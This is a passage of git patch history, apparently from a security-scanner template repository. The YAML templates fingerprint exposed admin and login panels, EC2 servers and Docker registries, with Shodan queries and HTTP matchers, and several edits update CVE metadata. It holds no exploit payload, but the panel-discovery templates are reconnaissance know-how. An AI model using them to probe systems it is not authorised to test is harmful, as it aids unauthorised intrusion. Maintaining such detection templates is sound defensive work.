2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:38:52 +0530 Subject: [PATCH 0530/1133] Create amazon-ec2-detect.yaml --- technologies/aws/amazon-ec2-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/aws/amazon-ec2-detect.yaml diff --git a/technologies/aws/amazon-ec2-detect.yaml b/technologies/aws/amazon-ec2-detect.yaml new file mode 100644 index 0000000000..1fa0949efb --- /dev/null +++ b/technologies/aws/amazon-ec2-detect.yaml @@ -0,0 +1,21 @@ +id: amazon-ec2-detect + +info: + name: Amazon EC2 Server Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: "Server: EC2ws" + tags: tech,aws,ec2,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Server: EC2ws" From 730413ac5fcae430c5b8211e0e2f23ec7e0289cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Dec 2022 10:09:39 +0000 Subject: [PATCH 0531/1133] Auto Generated New Template Addition List [Tue Dec 20 10:09:39 UTC 2022] :robot: --- .new-additions | 26 ++++---------------------- 1 file changed, 4 insertions(+), 22 deletions(-) diff --git a/.new-additions b/.new-additions index ef78756834..df2227eb8d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,22 +1,4 @@ -cves/2022/CVE-2022-0785.yaml -cves/2022/CVE-2022-0788.yaml -cves/2022/CVE-2022-0824.yaml -cves/2022/CVE-2022-0867.yaml -cves/2022/CVE-2022-42746.yaml -cves/2022/CVE-2022-42747.yaml -cves/2022/CVE-2022-42748.yaml -cves/2022/CVE-2022-42749.yaml -default-logins/datahub-metadata-default-login.yaml -default-logins/samsung/samsung-printer-default-login.yaml -exposed-panels/airnotifier-panel.yaml -exposed-panels/deluge-webui-panel.yaml -exposed-panels/mailhog-panel.yaml -exposed-panels/payroll-management-system-panel.yaml -exposed-panels/wiren-board-webui.yaml -misconfiguration/confluence-dashboard.yaml -misconfiguration/encompass-cm1-homepage.yaml -misconfiguration/linktap-gateway-exposure.yaml -misconfiguration/ntop-panel-exposed.yaml -network/detection/ibm-d2b-database-server-detect.yaml -network/detection/mikrotik-routeros-api-detect.yaml -technologies/aem-cms.yaml +network/cowrie-honeypot-detect.yaml +network/ftp-default-credentials.yaml +takeovers/feedpress-takeover.yaml +takeovers/tictail-takeover.yaml From 278bf4de1c14760dd01336017531c26c8d0922ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:40:30 +0530 Subject: [PATCH 0532/1133] Delete amazon-ec2-detect.yaml --- technologies/aws/amazon-ec2-detect.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 technologies/aws/amazon-ec2-detect.yaml diff --git a/technologies/aws/amazon-ec2-detect.yaml b/technologies/aws/amazon-ec2-detect.yaml deleted file mode 100644 index 1fa0949efb..0000000000 --- a/technologies/aws/amazon-ec2-detect.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: amazon-ec2-detect - -info: - name: Amazon EC2 Server Detect - author: ritikchaddha - severity: info - metadata: - verified: true - shodan-query: "Server: EC2ws" - tags: tech,aws,ec2,amazon - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: header - words: - - "Server: EC2ws" From 54e4042cd54ed2dfc4363199a1f0a7651c93ca9d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:40:55 +0530 Subject: [PATCH 0533/1133] Create amazon-ec2-detect.yaml --- technologies/aws/amazon-ec2-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/aws/amazon-ec2-detect.yaml diff --git a/technologies/aws/amazon-ec2-detect.yaml b/technologies/aws/amazon-ec2-detect.yaml new file mode 100644 index 0000000000..1fa0949efb --- /dev/null +++ b/technologies/aws/amazon-ec2-detect.yaml @@ -0,0 +1,21 @@ +id: amazon-ec2-detect + +info: + name: Amazon EC2 Server Detect + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: "Server: EC2ws" + tags: tech,aws,ec2,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Server: EC2ws" From f991746ef317da5da6fb75a0154ac0cb48b2ec19 Mon Sep 17 00:00:00 2001 From: davtur19 Date: Tue, 20 Dec 2022 11:16:25 +0100 Subject: [PATCH 0534/1133] Add reference to docker-registry --- misconfiguration/docker-registry.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/misconfiguration/docker-registry.yaml b/misconfiguration/docker-registry.yaml index 595c423904..d960a53b2f 100644 --- a/misconfiguration/docker-registry.yaml +++ b/misconfiguration/docker-registry.yaml @@ -4,6 +4,8 @@ info: name: Docker Registry Listing author: puzzlepeaches severity: medium + reference: + - https://notsosecure.com/anatomy-of-a-hack-docker-registry tags: docker,devops requests: From ccbf3aed0769905e69000d9c36e4140d2d0e111d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 20 Dec 2022 10:25:15 +0000 Subject: [PATCH 0535/1133] Auto Generated CVE annotations [Tue Dec 20 10:25:15 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 3 ++- cves/2019/CVE-2019-3911.yaml | 2 +- cves/2019/CVE-2019-3912.yaml | 2 +- cves/2021/CVE-2021-35587.yaml | 2 +- cves/2022/CVE-2022-41840.yaml | 10 ++++++++-- 5 files changed, 13 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d8b0df087..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,9 +12,10 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 + cwe-id: CWE-284 tags: cve,cve2019,oracle,rce,weblogic requests: diff --git a/cves/2019/CVE-2019-3911.yaml b/cves/2019/CVE-2019-3911.yaml index 4a49beede1..debfaab3d3 100644 --- a/cves/2019/CVE-2019-3911.yaml +++ b/cves/2019/CVE-2019-3911.yaml @@ -9,7 +9,7 @@ info: - https://www.tenable.com/security/research/tra-2019-03 - https://nvd.nist.gov/vuln/detail/CVE-2019-3911 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3911 cwe-id: CWE-79 diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index c8e7f22c1b..080ab85add 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -10,7 +10,7 @@ info: - https://www.cvedetails.com/cve/CVE-2019-3912 - https://nvd.nist.gov/vuln/detail/CVE-2019-3912 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3912 cwe-id: CWE-601 diff --git a/cves/2021/CVE-2021-35587.yaml b/cves/2021/CVE-2021-35587.yaml index 7f4cbd0ed0..eeb920cbb4 100644 --- a/cves/2021/CVE-2021-35587.yaml +++ b/cves/2021/CVE-2021-35587.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-502 metadata: fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle + tags: cve,cve2021,oam,rce,java,unauth,oracle,kev requests: - method: GET diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index a41cd1af55..b664082bef 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -3,15 +3,21 @@ id: CVE-2022-41840 info: name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal author: theamanrawat - severity: high + severity: critical + description: | + Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 + - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-41840 + cwe-id: CWE-22 metadata: - verified: true + verified: "true" tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop requests: From 0aee3ac99492b93527f3f2b03cea4dbba7ba2dd6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 19:39:04 +0530 Subject: [PATCH 0536/1133] Update docker-registry.yaml --- misconfiguration/docker-registry.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/misconfiguration/docker-registry.yaml b/misconfiguration/docker-registry.yaml index d960a53b2f..11cbb32d62 100644 --- a/misconfiguration/docker-registry.yaml +++ b/misconfiguration/docker-registry.yaml @@ -6,20 +6,23 @@ info: severity: medium reference: - https://notsosecure.com/anatomy-of-a-hack-docker-registry - tags: docker,devops + tags: misconfig,docker,devops requests: - method: GET path: - "{{BaseURL}}/v2/_catalog" + host-redirects: true max-redirects: 1 matchers-condition: and matchers: - type: word + part: body words: - '"repositories":' + - type: word + part: header words: - "application/json" - part: header From b2967375cec1a75ee2a271b8643b29e75c801e3a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Dec 2022 21:09:59 +0530 Subject: [PATCH 0537/1133] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index e617718b45..4a22e910a9 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -36,11 +36,12 @@ requests: words: - ".sh" - ".cgi" + condition: and + - type: word part: header words: - 'application/octet-stream' - condition: and - type: status status: From 7ffaf6dada2c6dbfda47bdd060324ea8de34cedf Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Wed, 21 Dec 2022 00:46:26 +0530 Subject: [PATCH 0538/1133] Added template for webuzo-admin-panel --- exposed-panels/webuzo-admin-panel.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposed-panels/webuzo-admin-panel.yaml diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/webuzo-admin-panel.yaml new file mode 100644 index 0000000000..17602ba2a3 --- /dev/null +++ b/exposed-panels/webuzo-admin-panel.yaml @@ -0,0 +1,30 @@ +id: webuzo-admin-panel + +info: + name: Webuzo - Admin Panel + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Webuzo - Admin Panel" + tags: webuzo, login, panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Webuzo - Admin Panel' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 85c372c286b73923aea6baf6cc02244a674f9721 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Wed, 21 Dec 2022 01:07:58 +0530 Subject: [PATCH 0539/1133] Added template for creatio-login-panel --- exposed-panels/creatio-login-panel.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/creatio-login-panel.yaml diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml new file mode 100644 index 0000000000..2a18207286 --- /dev/null +++ b/exposed-panels/creatio-login-panel.yaml @@ -0,0 +1,28 @@ +id: creatio-login-panel + +info: + name: Creatio - login Panel + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Creatio" + tags: creatio,login,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/Login/NuiLogin.aspx' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Creatio' + + - type: status + status: + - 200 \ No newline at end of file From e1a708108536e199e6274ddeef77176c86ff85b6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:14:58 +0530 Subject: [PATCH 0540/1133] Update and rename creatio-login-panel.yaml to webuzo-admin-panel.yaml --- exposed-panels/creatio-login-panel.yaml | 28 ------------------------- exposed-panels/webuzo-admin-panel.yaml | 28 +++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 28 deletions(-) delete mode 100644 exposed-panels/creatio-login-panel.yaml create mode 100644 exposed-panels/webuzo-admin-panel.yaml diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml deleted file mode 100644 index 2a18207286..0000000000 --- a/exposed-panels/creatio-login-panel.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: creatio-login-panel - -info: - name: Creatio - login Panel - author: theamanrawat - severity: info - metadata: - verified: true - shodan-query: http.title:"Creatio" - tags: creatio,login,panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/Login/NuiLogin.aspx' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Creatio' - - - type: status - status: - - 200 \ No newline at end of file diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/webuzo-admin-panel.yaml new file mode 100644 index 0000000000..efb726979d --- /dev/null +++ b/exposed-panels/webuzo-admin-panel.yaml @@ -0,0 +1,28 @@ +id: webuzo-admin-panel + +info: + name: Webuzo Admin Panel + author: theamanrawat + severity: info + metadata: + verified: true + shodan-query: http.title:"Webuzo - Admin Panel" + tags: panel,webuzo,admin + +requests: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Webuzo - Admin Panel' + + - type: status + status: + - 200 From cfaff6a710fc07db09bf9e2b499d0618983b1fac Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:17:31 +0530 Subject: [PATCH 0541/1133] Update and rename webuzo-admin-panel.yaml to creatio-login-panel.yaml --- ...admin-panel.yaml => creatio-login-panel.yaml} | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename exposed-panels/{webuzo-admin-panel.yaml => creatio-login-panel.yaml} (52%) diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/creatio-login-panel.yaml similarity index 52% rename from exposed-panels/webuzo-admin-panel.yaml rename to exposed-panels/creatio-login-panel.yaml index efb726979d..1ad5f5574b 100644 --- a/exposed-panels/webuzo-admin-panel.yaml +++ b/exposed-panels/creatio-login-panel.yaml @@ -1,27 +1,27 @@ -id: webuzo-admin-panel +id: creatio-login-panel info: - name: Webuzo Admin Panel + name: Creatio - login Panel author: theamanrawat severity: info metadata: verified: true - shodan-query: http.title:"Webuzo - Admin Panel" - tags: panel,webuzo,admin + shodan-query: http.title:"Creatio" + tags: creatio,login,panel requests: - method: GET path: - - "{{BaseURL}}" + - '{{BaseURL}}' + - '{{BaseURL}}/Login/NuiLogin.aspx' - host-redirects: true - max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'Webuzo - Admin Panel' + - 'Creatio' - type: status status: From 4ac26feb739b51c2f65ee55db69e9d9e3d067c2c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:30:40 +0530 Subject: [PATCH 0542/1133] Update webuzo-admin-panel.yaml --- exposed-panels/webuzo-admin-panel.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/exposed-panels/webuzo-admin-panel.yaml b/exposed-panels/webuzo-admin-panel.yaml index 17602ba2a3..efb726979d 100644 --- a/exposed-panels/webuzo-admin-panel.yaml +++ b/exposed-panels/webuzo-admin-panel.yaml @@ -1,20 +1,19 @@ id: webuzo-admin-panel info: - name: Webuzo - Admin Panel + name: Webuzo Admin Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"Webuzo - Admin Panel" - tags: webuzo, login, panel + tags: panel,webuzo,admin requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" - stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and @@ -22,9 +21,8 @@ requests: - type: word part: body words: - - 'Webuzo - Admin Panel' - condition: and + - 'Webuzo - Admin Panel' - type: status status: - - 200 \ No newline at end of file + - 200 From cd67105284aeca863595495a597b7140ce3feb00 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:51:10 +0530 Subject: [PATCH 0543/1133] Create posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposed-panels/posthog-admin-panel.yaml diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml new file mode 100644 index 0000000000..937c7139a5 --- /dev/null +++ b/exposed-panels/posthog-admin-panel.yaml @@ -0,0 +1,28 @@ +id: posthog-admin-panel + +info: + name: posthog-admin-panel + author: theabhinavgaur + severity: info + tags: posthog-admin-panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login?next=/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - POSTHOG_ + + - type: status + status: + - 200 + + - type: word + part: body + words: + - app.posthog.com From 439db51e14188e831e11132173656bbf1c5e347d Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:54:11 +0530 Subject: [PATCH 0544/1133] Update posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index 937c7139a5..5e6f675ca4 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -4,6 +4,8 @@ info: name: posthog-admin-panel author: theabhinavgaur severity: info + metadata: http.title:"posthog" + shodan-query: http.title:"Oracle Access Management" tags: posthog-admin-panel requests: From cebefe6a906ab0ed55027df35e8e398b8fd4bcd2 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 01:54:57 +0530 Subject: [PATCH 0545/1133] Update posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index 5e6f675ca4..03bd6b5ee3 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -4,8 +4,8 @@ info: name: posthog-admin-panel author: theabhinavgaur severity: info - metadata: http.title:"posthog" - shodan-query: http.title:"Oracle Access Management" + metadata: + shodan-query: http.title:"posthog" tags: posthog-admin-panel requests: From 464481607732e8b968db80175e8f29981b2e68b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Dec 2022 01:56:23 +0530 Subject: [PATCH 0546/1133] minor-update (#6399) --- cves/2022/CVE-2022-25082.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 4a22e910a9..d0cd95fd1a 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -32,14 +32,14 @@ requests: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - ".sh" - ".cgi" condition: and - type: word - part: header + part: header_2 words: - 'application/octet-stream' From 69742b61baa4a6befa8a76d77729c0d0e313d79f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 02:05:08 +0530 Subject: [PATCH 0547/1133] Update creatio-login-panel.yaml --- exposed-panels/creatio-login-panel.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/exposed-panels/creatio-login-panel.yaml b/exposed-panels/creatio-login-panel.yaml index 1ad5f5574b..a90d09f947 100644 --- a/exposed-panels/creatio-login-panel.yaml +++ b/exposed-panels/creatio-login-panel.yaml @@ -1,27 +1,28 @@ id: creatio-login-panel info: - name: Creatio - login Panel + name: Creatio Login Panel author: theamanrawat severity: info metadata: verified: true shodan-query: http.title:"Creatio" - tags: creatio,login,panel + tags: panel,creatio requests: - method: GET path: - - '{{BaseURL}}' - '{{BaseURL}}/Login/NuiLogin.aspx' - stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'Creatio' + - '/creatio/widget' + - 'creatio-sdk/' + - 'Creatio Debug mode' + condition: or - type: status status: From 2bc400c208189fdddf52c754031010e85d34d048 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 02:14:22 +0530 Subject: [PATCH 0548/1133] Update posthog-admin-panel.yaml --- exposed-panels/posthog-admin-panel.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/exposed-panels/posthog-admin-panel.yaml b/exposed-panels/posthog-admin-panel.yaml index 03bd6b5ee3..fcf9621c71 100644 --- a/exposed-panels/posthog-admin-panel.yaml +++ b/exposed-panels/posthog-admin-panel.yaml @@ -1,12 +1,13 @@ id: posthog-admin-panel info: - name: posthog-admin-panel + name: Posthog Admin Panel author: theabhinavgaur severity: info metadata: + verified: true shodan-query: http.title:"posthog" - tags: posthog-admin-panel + tags: panel,posthog requests: - method: GET @@ -18,13 +19,11 @@ requests: - type: word part: body words: - - POSTHOG_ + - 'PostHog' + - 'content="PostHog' + - 'POSTHOG_HOST' + condition: or - type: status status: - 200 - - - type: word - part: body - words: - - app.posthog.com From 7b408f0dc8fd9f3713cf86c692c48abaadd26749 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:02:01 +0530 Subject: [PATCH 0549/1133] Create Loxone-Login.yaml --- Loxone-Login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 Loxone-Login.yaml diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml new file mode 100644 index 0000000000..e1e15a04ab --- /dev/null +++ b/Loxone-Login.yaml @@ -0,0 +1,26 @@ +id: loxone-login + +info: + name: Loxone-Intercom-Video-Login + author: theabhinavgaur + severity: info + metadata: + verified: true + shodan-query: http.title:"Loxone Intercom Video" + tags: panel,Loxone + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - Loxone Intercom Video + + - type: status + status: + - 200 From d4e0fe700b27920d63357213ce4cb4ea353d7dcb Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:05:13 +0530 Subject: [PATCH 0550/1133] Update Loxone-Login.yaml --- Loxone-Login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index e1e15a04ab..3a5258cd38 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -4,9 +4,9 @@ info: name: Loxone-Intercom-Video-Login author: theabhinavgaur severity: info - metadata: - verified: true - shodan-query: http.title:"Loxone Intercom Video" + metadata: + verified: true + shodan-query: http.title:"Loxone Intercom Video" tags: panel,Loxone requests: From 1985de2f6bf9c6c1eff4ffe81326296544392216 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:08:55 +0530 Subject: [PATCH 0551/1133] Update Loxone-Login.yaml --- Loxone-Login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index 3a5258cd38..0532903c0b 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -4,8 +4,7 @@ info: name: Loxone-Intercom-Video-Login author: theabhinavgaur severity: info - metadata: - verified: true + metadata: shodan-query: http.title:"Loxone Intercom Video" tags: panel,Loxone From b31a4c0eb1d025e3d9f77ca68a1fa570231cc787 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Wed, 21 Dec 2022 13:14:20 +0530 Subject: [PATCH 0552/1133] Update Loxone-Login.yaml --- Loxone-Login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/Loxone-Login.yaml b/Loxone-Login.yaml index 0532903c0b..a384eca38b 100644 --- a/Loxone-Login.yaml +++ b/Loxone-Login.yaml @@ -4,8 +4,9 @@ info: name: Loxone-Intercom-Video-Login author: theabhinavgaur severity: info - metadata: - shodan-query: http.title:"Loxone Intercom Video" + metadata: + verified: true + shodan-query: http.title:"Loxone Intercom Video" tags: panel,Loxone requests: From 88281faf9f2d14f8f201231e86273565cafd99de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 21 Dec 2022 08:01:50 +0000 Subject: [PATCH 0553/1133] Auto Generated New Template Addition List [Wed Dec 21 08:01:50 UTC 2022] :robot: --- .new-additions | 67 ++++++++------------------------------------------ 1 file changed, 10 insertions(+), 57 deletions(-) diff --git a/.new-additions b/.new-additions index 32f111c5f2..ef56fab368 100644 --- a/.new-additions +++ b/.new-additions @@ -1,57 +1,10 @@ -cves/2019/CVE-2019-6802.yaml -cves/2021/CVE-2021-20323.yaml -cves/2021/CVE-2021-24827.yaml -cves/2021/CVE-2021-25099.yaml -cves/2022/CVE-2022-0826.yaml -cves/2022/CVE-2022-0948.yaml -cves/2022/CVE-2022-1595.yaml -cves/2022/CVE-2022-2314.yaml -cves/2022/CVE-2022-4050.yaml -cves/2022/CVE-2022-45917.yaml -default-logins/apache/karaf-default-login.yaml -default-logins/lutron/lutron-default-login.yaml -exposed-panels/aircube-dashboard-panel.yaml -exposed-panels/gyra-master-admin.yaml -exposed-panels/ilias-panel.yaml -exposed-panels/mag-dashboard-panel.yaml -exposed-panels/microfocus-admin-server.yaml -exposed-panels/netris-dashboard-panel.yaml -exposed-panels/planet-estream-panel.yaml -exposed-panels/spark-panel.yaml -exposed-panels/verizon-router-panel.yaml -exposures/configs/config-json.yaml -exposures/configs/golangci-config.yaml -exposures/configs/stestr-config.yaml -exposures/configs/websheets-config.yaml -exposures/files/database-credentials.yaml -exposures/files/gradle-libs.yaml -exposures/files/kubernetes-etcd-keys.yaml -exposures/files/routes-ini.yaml -exposures/files/salesforce-credentials.yaml -exposures/files/svn-wc-db.yaml -exposures/logs/badarg-log.yaml -exposures/logs/firebase-debug-log.yaml -exposures/logs/npm-debug-log.yaml -exposures/logs/production-log.yaml -iot/homeworks-illumination.yaml -miscellaneous/sitemap-detect.yaml -misconfiguration/installer/easyscripts-installer.yaml -misconfiguration/installer/metaview-explorer-installer.yaml -misconfiguration/unauth-mautic-upgrade.yaml -misconfiguration/unauth-zwave-mqtt.yaml -misconfiguration/vernemq-status-page.yaml -network/detection/cisco-finger-detect.yaml -network/detection/finger-detect.yaml -network/detection/mysql-detect.yaml -network/detection/redis-detect.yaml -network/detection/rpcbind-portmapper-detect.yaml -takeovers/leadpages-takeover.yaml -technologies/apache/apache-karaf-panel.yaml -technologies/icecast-server-detect.yaml -technologies/mikrotik-httpproxy.yaml -technologies/pagespeed-detect.yaml -vulnerabilities/nps/nps-auth-bypass.yaml -vulnerabilities/qibocms-file-download.yaml -vulnerabilities/vmware/vmware-nsx-stream-rce.yaml -vulnerabilities/zend/zend-v1-xss.yaml -vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +cves/2022/CVE-2022-0786.yaml +cves/2022/CVE-2022-25082.yaml +exposed-panels/creatio-login-panel.yaml +exposed-panels/posthog-admin-panel.yaml +exposed-panels/webuzo-admin-panel.yaml +exposed-panels/xfinity-panel.yaml +iot/carel-plantvisor-panel.yaml +iot/hue-personal-wireless-panel.yaml +network/exposed-dockerd.yaml +technologies/aws/amazon-ec2-detect.yaml From c11ca5fcadc26eae880de8c85a039f872f279270 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 21 Dec 2022 21:52:04 +0530 Subject: [PATCH 0554/1133] Update 